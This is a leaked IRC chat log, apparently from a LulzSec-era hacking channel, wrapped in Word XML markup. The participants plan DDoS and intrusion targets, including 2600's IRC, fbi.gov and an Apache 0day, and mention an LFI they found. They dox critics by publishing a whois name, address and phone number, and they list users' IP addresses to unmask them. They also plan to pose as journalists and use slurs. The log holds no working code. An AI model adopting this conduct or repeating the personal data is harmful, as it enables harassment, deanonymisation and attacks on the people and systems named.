        <w:t>Jun 01 03:00:53 storm my friend owns it &gt;:| Jun 01 03:01:15 [redacted] lulz.net is ran by furrys Jun 01 03:01:18 [redacted] yiff in hell Jun 01 03:01:18 [redacted] :] Jun 01 03:01:45 Topiary http://i.imgur.com/dFaz0.jpg banner at the top links to whatever, rest is just background (including rainbow) Jun 01 03:01:45 storm wat Jun 01 03:01:49 Topiary it's in progress etc Jun 01 03:01:53 lol im a furry im sat here in my fur suit :D Jun 01 03:02:02 [redacted] oh you troll :D Jun 01 03:02:37 storm FailSec The Fail Boat Jun 01 03:02:37 storm @ Jun 01 03:02:37 storm @awinee @LulzSec so ok i ran this thing but nothing happened, wth chinese pirates are killing my cuban refugees!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:02:43 storm is he talking about my ddoses?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:02:48 storm cause i hit from chinese boxes Jun 01 03:02:50 storm lol Jun 01 03:03:15 Topiary nah they don't know where China is on the map Jun 01 03:03:18 Topiary let alone what a box is Jun 01 03:03:20 storm probably looks like a botnet of china residentals Jun 01 03:03:33 storm ahh Jun 01 03:06:02 storm i guess i put too much credit in people Jun 01 03:06:19 lol i say we just root 2600 and sniff their IRCD for a few month Jun 01 03:06:47 Topiary easier said than don-- wait, you're kayla :x Jun 01 03:06:54 Topiary easier done than said in that case Jun 01 03:06:57 storm i want an apache 0day &gt;:| sniff the fk out of them Jun 01 03:06:58 joepie92 Topiary Jun 01 03:07:05 joepie92 do you has any more screenshots of site design? Jun 01 03:07:16 Topiary not really Jun 01 03:07:17 Topiary why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:07:53 joepie92 because I'm curious :P Jun 01 03:08:49 Topiary only has this other one: http://i.imgur.com/3WpEq.jpg Jun 01 03:08:54 Topiary where the rainbow chills behind and the border is gone Jun 01 03:08:55 joepie92 what the shit - adrian lamo registered lulzsec.com? Jun 01 03:09:16 joepie92 also, Topiary, make the rainbow overlay the page content :3 Jun 01 03:09:32 * devrandom (devrandom@HA-cgq.t9g.4u7qps.IP) has joined #pure-elite Jun 01 03:09:52 Topiary indeed joepie Jun 01 03:09:58 &lt;devrandom&gt; hello folks Jun 01 03:10:09 lol hey :D Jun 01 03:10:16 Topiary and yes he did Jun 01 03:10:19 Topiary http://whois.domaintools.com/lulzsec.com Jun 01 03:10:48 lol im telling you :D Jun 01 03:10:52 lol it's cos he's an attention seeker Jun 01 03:10:54 &lt;devrandom&gt; sorry i haven't been in much ... got a new machine, been working on vm shite Jun 01 03:10:58 lol it's so someone whois it Jun 01 03:11:01 lol and sees his name Jun 01 03:11:05 lol so he gets a mention Jun 01 03:11:06 lol lol Jun 01 03:11:15 lol really do hate ppl like that Jun 01 03:11:52 lol he's never hacked anything, he sat out side of some building cracked their wifi and then went and told them so he could get arrested and get a mention lol Jun 01 03:11:54 lol wtf Jun 01 03:11:54 Topiary the world would be a better place without 2600 ;x Jun 01 03:12:04 lol he has links to google searchs of himself Jun 01 03:12:12 lol he really, really is lonely Jun 01 03:12:43 storm so are they a target aside from just packeting? Jun 01 03:12:59 lol they are complete fair game :) Jun 01 03:13:15 lol the j3st3rs dox would be nice :) Jun 01 03:13:18 Topiary well A) they are a bunch of asshats, B) Jester is a fucktard who *everyone* would want to destroy, C) Apache 0day, D) Adrian needs a spanking Jun 01 03:13:29 joepie92 E) bring the lulz Jun 01 03:13:30 joepie92 :D Jun 01 03:13:35 Topiary yes, that too Jun 01 03:14:44 Topiary ah wait that was Adrian Chen sending us those insulting tweets Jun 01 03:14:47 Topiary both losers Jun 01 03:15:14 storm i like C most of all Jun 01 03:15:15 storm ;x Jun 01 03:15:17 Topiary he tried to arrange an interview with LulzSec, told him to fuck off before Gawker gets rooted Jun 01 03:15:26 Topiary then he tweets us saying PBS hack was stupid Jun 01 03:15:36 lol isn't tht apache 0day pub yet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:15:37 Topiary cuts deep :( Jun 01 03:16:26 storm well if it were public it wouldnt be a 0day anymore Jun 01 03:16:27 storm ;x Jun 01 03:16:34 lol tru :o Jun 01 03:18:03 Topiary (Jester's flavour of choice is Ubuntu, FYI) Jun 01 03:18:18 lol NS History: Jun 01 03:18:18 lol 1 change on 2 unique name servers over 0 year.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:18:18 lol Reverse IP: Jun 01 03:18:18 lol 164,461 other sites hosted on this server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:18:18 lol Log In or Create a FREE account to start monitoring this domain name Jun 01 03:18:18 lol DomainTools for Windows Jun 01 03:18:18 lol Now you can access domain ownership records anytime, anywhere... right from your own desktop! Download Now&gt; Jun 01 03:18:18 lol Domain Name: lulzsec.com Jun 01 03:18:18 lol Registrant Contact: Jun 01 03:18:18 lol Adrian Lamo Jun 01 03:18:18 lol LulzSec LLC Jun 01 03:18:18 lol 108 WEST 13TH STREET Jun 01 03:18:19 lol Wilmington, Delaware 19801-1145 Jun 01 03:18:20 lol US Jun 01 03:18:21 lol +1.8889201981 Jun 01 03:18:53 lol do you think he's tht much of an attention seeker to use his real address?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:19:05 Topiary we could always call his ass Jun 01 03:19:08 lol can someone in the US phone tht number and see if it's really him?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:19:12 Topiary I'll call him Jun 01 03:19:32 lol if so i'll do some ic3 requests as him being the leader of luzsec, he owns the domain afterall Jun 01 03:19:41 joepie92 &gt;LulzSec LLC Jun 01 03:19:42 lol :D Jun 01 03:19:47 Topiary what does he sound like?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:20:02 lol a looser Jun 01 03:20:04 lol xD Jun 01 03:20:10 lol just say you are media Jun 01 03:20:14 lol and you found the domain Jun 01 03:20:20 lol and you'd like to interview him Jun 01 03:20:27 lol feed his need for attention Jun 01 03:20:30 lol :D Jun 01 03:20:30 joepie92 big potential for lulz is big Jun 01 03:20:54 lol yes :D Jun 01 03:20:57 Topiary calling him now Jun 01 03:21:00 Topiary ringring Jun 01 03:21:05 joepie92 Topiary Jun 01 03:21:06 joepie92 skype Jun 01 03:21:06 storm at 3am lol Jun 01 03:21:06 joepie92 :( Jun 01 03:21:08 joepie92 and tinychat Jun 01 03:21:09 lol :3 Jun 01 03:21:16 storm i agree @ skype Jun 01 03:21:16 storm ;x Jun 01 03:21:22 Topiary he's not there, AT&amp;T virtual blahblahblah not available Jun 01 03:21:26 joepie92 lol Jun 01 03:21:33 joepie92 AT&amp;T :o Jun 01 03:21:42 joepie92 didn't we have some... AT&amp;T noms?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:21:50 lol yes :D Jun 01 03:22:06 lol i think it was only their buisnuiess stuff?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:22:09 joepie92 ye Jun 01 03:22:09 joepie92 well Jun 01 03:22:16 joepie92 it wouldnt surprise me Jun 01 03:22:20 joepie92 if Lamo had a business acct Jun 01 03:22:42 joepie92 Topiary.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:22:47 joepie92 someone thinks Avunit is you Jun 01 03:22:54 Topiary someone thinks everyone is me Jun 01 03:22:59 joepie92 lol Jun 01 03:23:04 storm I am Topiary Jun 01 03:23:06 joepie92 http://anons.wikia.com/wiki/Topiary Jun 01 03:23:07 lol even im Topiary :D Jun 01 03:23:11 storm Jun 01 03:23:12 Topiary goddamnit what the fuck is that Jun 01 03:23:13 storm I'm lol too Jun 01 03:23:15 joepie92 Aliases Jun 01 03:23:16 joepie92 Topiary, AVUnit, Whirlpool Jun 01 03:23:18 storm ;d Jun 01 03:23:23 lol this entire channel is Topiary talking to himself :D Jun 01 03:23:28 joepie92 also Jun 01 03:23:30 joepie92 that is a wiki Jun 01 03:23:32 joepie92 with tinychat screencaps Jun 01 03:23:44 joepie92 and small amounts of dox Jun 01 03:23:44 lol screen sessions, screen sessions everywhere Jun 01 03:24:10 Topiary attributes: cautious Jun 01 03:24:15 Topiary what-does-it-mean.avi Jun 01 03:24:28 joepie92 lol Jun 01 03:24:29 joepie92 so Jun 01 03:24:32 joepie92 what I am wondering about Jun 01 03:24:40 joepie92 is why "Homosexual" is not just in the Attributes template Jun 01 03:24:48 joepie92 as 99% of the tinychatfags seems to fit that description Jun 01 03:25:07 Topiary "frequently makes prank calls" Jun 01 03:25:13 Topiary I went on TinyChat one night and did them :( Jun 01 03:25:19 Topiary these guys have done their research!!11 Jun 01 03:25:22 joepie92 lol Jun 01 03:25:24 lol we need to pwn a media/mews company and offer j35t3r an interview see if he bites, see what we can extract out of him?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:25:41 lol pose as media Jun 01 03:25:43 lol :D Jun 01 03:26:00 storm kayla 4 prez Jun 01 03:26:51 Topiary this is worse than the time some faggot did this Jun 01 03:26:52 Topiary http://en.wikipedia.org/wiki/Topiary_%28hacktivist%29 Jun 01 03:26:57 Topiary can we delete this somehow?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:27:21 joepie92 interesting.... the guy who made the wikia one is using anonine Jun 01 03:27:27 lol It's worth noting that he has a particular fondness for bitcoins, and is likely the one who manages the bitcoin donations to LulzSec.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:27:30 storm Not much is known about Corey, except that he uses a voice changer on TinyChat to deepen his voice and the he will incessantly ask to see men's genitals while trying to engage them in the webcam equivalent of phone sex. He seems to be particularly interested in Topiary. Jun 01 03:27:32 storm ROFLMFAO Jun 01 03:27:38 joepie92 and Topiary, you can always play the notability cad Jun 01 03:27:39 joepie92 card* Jun 01 03:27:57 joepie92 if you sound convinced enough that you're not notable Jun 01 03:28:00 joepie92 wikipedo's will remove anything Jun 01 03:28:15 joepie92 storm: fun thing is that's coreys actual voice Jun 01 03:28:15 joepie92 lol Jun 01 03:28:20 joepie92 :D Jun 01 03:28:22 * joepie92 lulz Jun 01 03:28:25 storm xD Jun 01 03:28:29 Topiary who made this Wiki?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:28:36 Topiary because all their facts come from lurking in TinyChat for one night Jun 01 03:28:59 * devrandom has quit (Quit: leaving) Jun 01 03:29:11 lol awinee was braggin about being in a tiny chat on his twitter lol Jun 01 03:29:18 joepie92 HA Jun 01 03:29:19 Topiary yeah he was Jun 01 03:29:20 joepie92 FUCKING MORON Jun 01 03:29:20 joepie92 http://anons.wikia.com/wiki/Special:Contributions/76.106.247.143 Jun 01 03:29:22 joepie92 HAHAHAHA Jun 01 03:29:28 joepie92 c-76-106-247-143.hsd1.fl.comcast.net Jun 01 03:29:31 joepie92 nice vpn bro Jun 01 03:29:34 lol proberbly him, someone shuld include his dox on tht wiki page as supreme anonymous leader Jun 01 03:29:35 Topiary sec Jun 01 03:29:52 lol lol deffinetly not VPN :D Jun 01 03:29:57 lol someone social tht ISP Jun 01 03:29:58 lol :D Jun 01 03:30:12 joepie92 other person uses anonine Jun 01 03:30:24 joepie92 so I guess it's time for some user searching on anonops Jun 01 03:30:25 joepie92 :D Jun 01 03:30:39 Topiary * Asherah (Asherah@93-94-245- 147.dynamic.swissvpn.net) Jun 01 03:30:39 Topiary asherah_ is Asherah@74.115.212.38 * Asherah Jun 01 03:30:39 Topiary * amob (~amob@pool-71-191-255- 116.washdc.fios.verizon.net) Jun 01 03:30:39 Topiary * Cephurs (~wtf@pool-71-126-168- 162.washdc.fios.verizon.net) Jun 01 03:30:39 Topiary cephurs was ~ching@LCaen-156-54-21-76.w80- 11.abo.wanadoo.fr * ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:30:39 Topiary cephurs was ~ching@85.17.254.135 * ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:30:43 Topiary cephurs was ~ching@rainbowwarrior.torservers.net * ... Jun 01 03:30:45 lol fuck if it was road runner i know someone who can fully dox IP -&gt; address name everything Jun 01 03:30:45 Topiary * T71 (T71@66-168-112-216.dhcp.oxfr.ma.charter.com) has joined #jester Jun 01 03:30:47 Topiary === bluesoul120 &lt;~bluesoul@46.20.33.115&gt; ''bluesoul'' Jun 01 03:30:49 Topiary bluesoul120 is ~bluesoul@178.86.6.11 * bluesoul Jun 01 03:30:51 Topiary godbert (~godbert@c-98-250-11- 251.hsd1.mi.comcast.net) has joined #jester Jun 01 03:30:53 Topiary godbert was ~godbert@cpe-68-173-45- 234.nyc.res.rr.com * juevos rancheros Jun 01 03:30:55 Topiary Matches?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:31:24 joepie92 173.244.215.65.static.midphase.com Jun 01 03:31:40 lol c-76-106-247-143.hsd1.fl.comcast.net Jun 01 03:31:40 lol is flordia?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:31:42 joepie92 let me get the other ips Jun 01 03:31:42 joepie92 ya Jun 01 03:31:48 storm i'm in florida Jun 01 03:31:50 storm :O Jun 01 03:31:53 lol :o Jun 01 03:32:16 joepie92 Naam: 76-216-232- 237.lightspeed.sndgca.sbcglobal.net Jun 01 03:32:16 joepie92 Address: 76.216.232.237 Jun 01 03:33:00 joepie92 Naam: 219-89-200-76.adsl.xtra.co.nz Jun 01 03:33:00 joepie92 Address: 219.89.200.76 Jun 01 03:33:57 joepie92 ok Jun 01 03:34:00 joepie92 that's it Jun 01 03:34:05 joepie92 can't see Nonynews' IP Jun 01 03:34:20 joepie92 full list of IPs that have edited the wiki (that are visible) is Jun 01 03:34:20 joepie92 188.126.75.119 Jun 01 03:34:20 joepie92 76.106.247.143 Jun 01 03:34:20 joepie92 173.244.215.65 Jun 01 03:34:20 joepie92 76.216.232.237 Jun 01 03:34:20 joepie92 219.89.200.76 Jun 01 03:37:01 joepie92 whoopsie Jun 01 03:37:03 joepie92 seems I just found a hit Jun 01 03:37:20 joepie92 anyone has any idea how I can see the actual nick connected to an IP?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:37:26 joepie92 /os session only shows the count Jun 01 03:37:59 lol how lol :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:39:19 Topiary 188.126.75.119 Jun 01 03:39:25 Topiary that's StrongVPN Jun 01 03:39:31 Topiary I've used that exact server before Jun 01 03:39:52 lol :O Jun 01 03:39:57 lol then it was YOUUUUUUUUUUUUU Jun 01 03:40:52 joepie92 1 ip matched, but it was kerkun _removing_ shit from the wiki Jun 01 03:40:58 joepie92 so that's not an issue Jun 01 03:41:15 Topiary 219.89.200.76 = Auckland NZ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:41:35 joepie92 Topiary Jun 01 03:41:37 joepie92 that was not strongvpn Jun 01 03:41:39 joepie92 but anonine Jun 01 03:41:54 Topiary are you sure? I've been on the 188.126.* range before on StrongVPN Jun 01 03:42:02 joepie92 C:\Users\ton&gt;nslookup 188.126.75.119 Jun 01 03:42:02 joepie92 Server: google-public-dns-a.google.com Jun 01 03:42:02 joepie92 Address: 8.8.8.8 Jun 01 03:42:02 joepie92 Naam: 75-119.anonymous.at.anonine.com Jun 01 03:42:02 joepie92 Address: 188.126.75.119 Jun 01 03:42:07 Topiary interesting Jun 01 03:42:22 joepie92 might be a shared range Jun 01 03:42:51 joepie92 there's not so many anonine users.... on anonops... Jun 01 03:42:54 joepie92 lemme check for the range Jun 01 03:43:38 Topiary that's Stockholm, Sweden at any rate Jun 01 03:43:53 Topiary thought it was; I should really go back to StrongVPN's Swedish jazz, real fast Jun 01 03:46:03 joepie92 can't find any of the other ranges Jun 01 03:46:04 joepie92 so Jun 01 03:46:05 joepie92 idk Jun 01 03:46:13 joepie92 I'll keep an eye out on these ranges Jun 01 03:47:03 Topiary well judging from reading all of their pages (which I just did), I'd say it's awinee Jun 01 03:47:28 Topiary considering their main base of facts/screenshots comes from TinyChat.com/AnonOpsParty in the last 6 days Jun 01 03:47:40 joepie92 unsure Jun 01 03:47:46 joepie92 it's not just awinee Jun 01 03:47:50 Topiary other nicks: f00, dumb, test, awineecamslut Jun 01 03:47:52 joepie92 that wiki has mention of phenzen being raided Jun 01 03:47:57 joepie92 afaik that was not shared in tinychat Jun 01 03:47:59 Topiary despite my absolute drunkenness, I remember those names trolling Jun 01 03:48:03 joepie92 wait, since when is f00 == awinee?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 03:48:18 Topiary oh, f00 might not have been trollin' Jun 01 03:48:23 joepie92 f00 is a troll Jun 01 03:48:25 joepie92 he is with ryan Jun 01 03:48:28 joepie92 and is known for fucking shit up Jun 01 03:48:32 Topiary ah, he was in TinyChat Jun 01 03:48:34 joepie92 but afaik it's not awinee Jun 01 03:50:16 Topiary okay well, I'm staying away from TinyChat with those camwhores anyway Jun 01 03:50:23 Topiary Sabu and I got a bit carried away and gave LulzSec away a bit Jun 01 03:51:08 Topiary I'm just assuming it's fakegregghoush + co., they monitor all of Parmy's posts Jun 01 03:51:19 Topiary I used "Whirlpool" in a recent LulzSec interview (the only interview) Jun 01 03:51:24 Topiary with Parmy; their Wiki is updated with it Jun 01 03:53:20 [redacted] mfw joepie's on windows Jun 01 03:59:12 [redacted] http://www.youtube.com/watch?v=Au8LGtxwEO4 Jun 01 03:59:50 lol you know what Jun 01 03:59:57 lol now i think about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04:00:04 lol all these j35tr fags Jun 01 04:00:17 lol are all ppl who've been caught dossing or something Jun 01 04:00:29 lol you think they turned FBI bitch :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 04:00:40 [redacted] its a conspiracy Jun 01 04:01:50 joepie92 yes, joepie is on windows Jun 01 04:01:51 joepie92 because Jun 01 04:01:52 joepie92 my fucking Jun 01 04:01:53 joepie92 router Jun 01 04:01:54 joepie92 is broken Jun 01 04:01:59 joepie92 and refuses to assign an IP to my linux box Jun 01 04:02:02 [redacted] excuses Jun 01 04:02:03 joepie92 no matter what I do Jun 01 04:02:03 [redacted] excuses Jun 01 04:02:13 [redacted] learn to ifconfig :D Jun 01 04:02:22 storm Jun 01 04:02:28 storm Linux nimbus 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux Jun 01 04:02:31 joepie92 [redacted] Jun 01 04:02:35 joepie92 the issue is my routers/modem Jun 01 04:02:43 joepie92 I have a shitty sweex router that never worked properly Jun 01 04:02:47 [redacted] sure right Jun 01 04:02:48 joepie92 a thomson speedtouch modem Jun 01 04:02:51 joepie92 that is shit Jun 01 04:02:52 [redacted] but it somehow synchs with your XP box Jun 01 04:02:55 [redacted] automagically Jun 01 04:03:02 [redacted] over DHCP Jun 01 04:03:02 joepie92 and a sitecom wifi router that has issues with assigning an IP Jun 01 04:03:04 joepie92 eh Jun 01 04:03:07 joepie92 because that always worked Jun 01 04:03:12 joepie92 the wifi issue is only since recently Jun 01 04:03:14 Topiary joepie just likes Windows Jun 01 04:03:18 joepie92 or rather, the IP assignment issue* Jun 01 04:03:42 [redacted] :D Jun 01 04:03:45 storm Windows is rubbish Jun 01 04:03:48 joepie92 it is Jun 01 04:03:51 joepie92 so is speedtouch Jun 01 04:03:56 joepie92 so is sitecom Jun 01 04:04:00 joepie92 and so is especially sweex Jun 01 04:04:08 storm sup m_ Jun 01 04:04:10 storm :) Jun 01 04:04:11 joepie92 I have some of the most retarded network equipment someone can possible have Jun 01 04:04:11 joepie92 -_- Jun 01 04:04:13 joepie92 possibly* Jun 01 04:04:17 [redacted] not much bro :] Jun 01 04:06:23 storm nice Jun 01 04:07:03 [redacted] found a nice lfi on the box we're supposed to migrate too Jun 01 04:07:04 [redacted] lol Jun 01 04:07:25 [redacted] been poking at it Jun 01 04:08:04 storm nice Jun 01 04:08:10 storm AIM for a sec?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 04:08:14 [redacted] sure Jun 01 04:27:31 [redacted] night guiz Jun 01 04:28:32 storm night Jun 01 04:28:37 joepie92 night Jun 01 04:29:29 lol nini :) Jun 01 04:30:04 joepie92 LOL Jun 01 04:30:05 joepie92 http://www.youtube.com/watch?v=ZmUlKPthrag Jun 01 04:30:09 joepie92 look at the top comments Jun 01 04:30:23 storm im hitting efnet spoofs Jun 01 04:30:23 storm ;x Jun 01 04:30:34 storm thats how bored i bez Jun 01 04:54:33 Topiary wanna find something to hit?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05:05:45 storm sure Jun 01 05:06:01 Topiary there's shit cool site Jun 01 05:06:03 Topiary fbi.gov Jun 01 05:06:10 lol xD Jun 01 05:06:14 storm lol Jun 01 05:06:24 lol ddos ic3.gov :D Jun 01 05:06:40 storm whats with everyone wanting to hit govs Jun 01 05:06:55 storm are you really that open to just going to jail ;x Jun 01 05:07:08 storm not you you, te royal you Jun 01 05:07:10 storm the even Jun 01 05:08:21 Topiary I suppose we could piss off some IRC for lulz Jun 01 05:10:19 storm sure Jun 01 05:10:32 joepie92 does any of you Jun 01 05:10:34 joepie92 know a user called Jun 01 05:10:35 joepie92 schmoo Jun 01 05:10:41 lol nope Jun 01 05:10:42 lol :/ Jun 01 05:10:44 lol why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:10:46 Topiary negative Jun 01 05:10:49 joepie92 I think it might be the nonynews guy Jun 01 05:10:52 joepie92 posting shit on wikia Jun 01 05:10:59 joepie92 but unsure Jun 01 05:11:02 joepie92 I've never seen him talk Jun 01 05:11:05 joepie92 he's in a lot of channels Jun 01 05:11:05 Topiary joepie92: nonynews posted on twitter that I was probably tweeting for LulzSec Jun 01 05:11:09 Topiary so yes Jun 01 05:11:10 Topiary might be Jun 01 05:11:13 joepie92 only thign Jun 01 05:11:19 joepie92 schmoo has op in propaganda Jun 01 05:11:23 joepie92 so I'm not sure how he got that Jun 01 05:11:33 joepie92 so I'd have to ask the channel founder there Jun 01 05:11:34 lol nonynews is prbs a jesterfag thinking they're being covert Jun 01 05:11:36 lol xD Jun 01 05:11:40 joepie92 nonynews also mentioned something Jun 01 05:11:42 lol best thing to do when bored Jun 01 05:11:43 joepie92 that happened in #coders Jun 01 05:11:50 joepie92 and there's only a few people there Jun 01 05:11:51 lol go to 2600 irc and just cause drama Jun 01 05:11:51 lol :D Jun 01 05:12:03 Topiary should we just go on over to 2600, flame them, and then packet it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:12:07 joepie92 @nonyNews Jun 01 05:12:07 joepie92 nony News Jun 01 05:12:07 joepie92 Peacemaking proposes an IP-spoofing version of #LOIC for use by #Anonymous. Ingenious!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:12:09 joepie92 that was in #coders Jun 01 05:12:50 joepie92 schmoo is/was in all channels that nonynews mentions shit from it seems Jun 01 05:13:08 joepie92 @nonyNews Jun 01 05:13:08 Topiary do we still have spies in #jester?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
